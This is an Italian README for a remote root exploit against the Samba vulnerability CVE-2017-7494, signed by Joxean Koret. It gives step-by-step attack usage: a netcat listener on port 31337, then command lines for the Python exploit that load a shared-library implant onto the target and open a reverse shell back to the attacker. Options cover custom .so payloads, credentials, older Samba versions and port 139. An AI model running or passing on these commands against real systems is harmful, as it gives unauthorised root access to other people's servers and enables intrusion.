
Exploit remoto di root per la vulnerabilità SAMBA CVE-2017-7494
Exploit remoto per root per la vulnerabilità SAMBA CVE-2017-7494.
Questo exploit è diviso in 2 parti:
Finché il target è vulnerabile e il payload è corretto per il sistema operativo e l'architettura del target, l'exploit è affidabile al 100%.
Sulla tua macchina, esegui il seguente comando:
$ nc -p 31337 -l
Quindi, esegui l'exploit contro il tuo target e attendi che si connetta di nuovo al tuo Netcat:
$ python cve_2017_7494.py -t target_ip
Se chiudi troppo velocemente la reverse shell, invece di eseguire di nuovo l'exploit caricando il modulo, ecc... puoi semplicemente passare il percorso del modulo già caricato. Supponendo che sia stato caricato in /shared/directory/ come "module.so", eseguirai un comando come il seguente:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
Ora puoi eseguire l'exploit contro samba 3.5.0 e 3.6.0, basta aggiungere l'argomento -o 1
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
Ora puoi usare il tuo custom .so
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
Nel caso in cui tu debba eseguire questo script da una macchina x86, la compilazione dei binari implant creerà due file x86. Usando il flag -n 1 puoi disabilitare la compilazione e copiare libimplantx64.so da un'altra macchina.
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Nel caso in cui samba giri solo sulla porta 139. Puoi impostare la porta del server remoto usando l'argomento -p
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
Non lo supporto più.
-- Joxean Koret